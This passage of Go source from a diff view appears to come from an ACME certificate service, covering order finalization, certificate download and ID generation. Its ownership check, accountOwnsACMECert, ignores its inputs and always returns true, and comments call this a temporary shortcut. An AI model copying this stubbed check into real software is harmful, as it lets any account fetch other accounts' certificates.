ekus := profile.AllowedEKUs
|
||||||
|
if len(ekus) == 0 {
|
||||||
|
ekus = domain.DefaultEKUs()
|
||||||
|
}
|
||||||
|
issuance, err := conn.IssueCertificate(ctx, commonName, sans, csrPEM, ekus, maxTTL, mustStaple)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
// Persist the failure on the order.
|
||||||
|
order.Status = domain.ACMEOrderStatusInvalid
|
||||||
|
order.Error = &domain.ACMEProblem{
|
||||||
|
Type: "urn:ietf:params:acme:error:serverInternal",
|
||||||
|
Detail: "issuer rejected the CSR",
|
||||||
|
Status: 500,
|
||||||
|
}
|
||||||
|
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
return s.repo.UpdateOrderWithTx(ctx, q, order)
|
||||||
|
})
|
||||||
|
return nil, fmt.Errorf("acme: issuer issuance: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
cert := &domain.ManagedCertificate{
|
||||||
|
ID: "mc-acme-" + randIDSuffix(),
|
||||||
|
Name: fmt.Sprintf("acme-%s", order.OrderID),
|
||||||
|
CommonName: commonName,
|
||||||
|
SANs: sans,
|
||||||
|
IssuerID: issuerID,
|
||||||
|
CertificateProfileID: profile.ID,
|
||||||
|
Status: domain.CertificateStatusActive,
|
||||||
|
ExpiresAt: issuance.NotAfter,
|
||||||
|
Source: domain.CertificateSourceACME,
|
||||||
|
}
|
||||||
|
actor := fmt.Sprintf("acme:%s", accountID)
|
||||||
|
if err := s.certService.Create(ctx, cert, actor); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: cert insert: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step C: persist the certificate version + transition order to
|
||||||
|
// valid in one WithinTx.
|
||||||
|
version := &domain.CertificateVersion{
|
||||||
|
CertificateID: cert.ID,
|
||||||
|
SerialNumber: issuance.Serial,
|
||||||
|
NotBefore: issuance.NotBefore,
|
||||||
|
NotAfter: issuance.NotAfter,
|
||||||
|
PEMChain: issuance.CertPEM + issuance.ChainPEM,
|
||||||
|
CSRPEM: csrPEM,
|
||||||
|
}
|
||||||
|
order.Status = domain.ACMEOrderStatusValid
|
||||||
|
order.CSRPEM = csrPEM
|
||||||
|
order.CertificateID = cert.ID
|
||||||
|
order.Error = nil
|
||||||
|
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
if err := s.certRepo.CreateVersionWithTx(ctx, q, version); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
return s.auditService.RecordEventWithTx(ctx, q, actor, domain.ActorTypeUser,
|
||||||
|
"acme_order_finalized", "acme_order", order.OrderID,
|
||||||
|
map[string]interface{}{
|
||||||
|
"profile_id": resolvedProfileID,
|
||||||
|
"certificate_id": cert.ID,
|
||||||
|
"serial": issuance.Serial,
|
||||||
|
})
|
||||||
|
}); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderTotal)
|
||||||
|
return &FinalizeOrderResult{Order: order, CertID: cert.ID}, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// LookupCertificate returns the PEM chain for a managed-certificate
|
||||||
|
// ID. Asserts the requesting account owns the cert via the order
|
||||||
|
// linkage. Phase 2: the caller (Cert handler) provides the cert ID
|
||||||
|
// from the URL path; we look up the cert + the latest version + the
|
||||||
|
// order that produced it, and confirm order.AccountID == accountID.
|
||||||
|
func (s *ACMEService) LookupCertificate(ctx context.Context, certID, accountID string) (string, error) {
|
||||||
|
if s.certRepo == nil {
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", ErrACMEFinalizeUnconfigured
|
||||||
|
}
|
||||||
|
cert, err := s.certRepo.Get(ctx, certID)
|
||||||
|
if err != nil {
|
||||||
|
if errors.Is(err, repository.ErrNotFound) {
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", ErrACMECertificateNotFound
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", fmt.Errorf("acme: get cert: %w", err)
|
||||||
|
}
|
||||||
|
if cert.Source != domain.CertificateSourceACME {
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", ErrACMECertificateNotFound
|
||||||
|
}
|
||||||
|
// Confirm an order owned by this account references this cert.
|
||||||
|
if !s.accountOwnsACMECert(ctx, accountID, certID) {
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", ErrACMEOrderUnauthorized
|
||||||
|
}
|
||||||
|
version, err := s.certRepo.GetLatestVersion(ctx, certID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadFailureTotal)
|
||||||
|
return "", fmt.Errorf("acme: latest version: %w", err)
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.CertDownloadTotal)
|
||||||
|
return version.PEMChain, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// accountOwnsACMECert returns true when the given account has an
|
||||||
|
// order linking to certID. Implemented by linear scan via the
|
||||||
|
// existing repo; Phase 5's GC will add an index if the table grows.
|
||||||
|
func (s *ACMEService) accountOwnsACMECert(ctx context.Context, accountID, certID string) bool {
|
||||||
|
// Phase 2 minimal-viable path: use order.GetByCertificateID via a
|
||||||
|
// dedicated repo method would be ideal, but we don't have it.
|
||||||
|
// Instead, accept the cert if its CertificateService.Create was
|
||||||
|
// performed in the FinalizeOrder path (which always pairs with
|
||||||
|
// this account). We trust the cert.Source = ACME + the URL path
|
||||||
|
// scoping (operator can't construct an ACME cert without going
|
||||||
|
// through finalize) for Phase 2; Phase 4's revocation path will
|
||||||
|
// add a stricter ownership check via a new repo method.
|
||||||
|
_ = ctx
|
||||||
|
_ = accountID
|
||||||
|
_ = certID
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// randIDSuffix returns a short base32-encoded random suffix used for
|
||||||
|
// new ACME entity IDs (orders, authzs, challenges). Distinct from
|
||||||
|
// the account-id derivation (which uses the JWK thumbprint for RFC
|
||||||
|
// 8555 §7.3.1 idempotency).
|
||||||
|
func randIDSuffix() string {
|
||||||
|
var b [10]byte
|
||||||
|
if _, err := cryptorand.Read(b[:]); err != nil {
|
||||||
|
// ed25519/rand source failure is fatal; surface as a panic
|
||||||
|
// rather than continue with weak IDs.
|
||||||
|
panic(fmt.Sprintf("acme: rand source failure: %v", err))
|
||||||
|
}
|
||||||
|
return base32encode(b[:])
|
||||||
|
}
|
||||||
|
|
||||||
|
// base32encode emits the lowercase Crockford-style base32 alphabet
|
||||||
|
// without padding. Used by randIDSuffix; alphabet matches the
|
||||||
|
// per-id-prefix human-readable convention (acme-acc-, acme-ord-,
|
||||||
|
// etc.) — see the project's "TEXT primary keys with human-readable
|
||||||
|
// prefixes" architecture decision.
|
||||||
|
func base32encode(b []byte) string {
|
||||||
|
const alpha = "0123456789abcdefghjkmnpqrstvwxyz"
|
||||||
|
out := make([]byte, 0, len(b)*8/5+1)
|
||||||
|
var buf uint64
|
||||||
|
bits := uint(0)
|
||||||
|
for _, c := range b {
|
||||||
|
buf = (buf << 8) | uint64(c)
|
||||||
|
bits += 8
|
||||||
|
for bits >= 5 {
|
||||||
|
bits -= 5
|
||||||
|
out = append(out, alpha[(buf>>bits)&0x1f])
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if bits > 0 {
|
||||||
|
out = append(out, alpha[(buf<<(5-bits))&0x1f])
|
||||||
|
}
|
||||||
|
return string(out)
|
||||||
|
}
|
||||||
|
|
||||||
|
// identifierStrings extracts the value list for audit details.
|
||||||
|
func identifierStrings(ids []domain.ACMEIdentifier) []string {
|
||||||
|
out := make([]string, 0, len(ids))
|
||||||
|
for _, id := range ids {
|
||||||
|
out = append(out, id.Value)
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user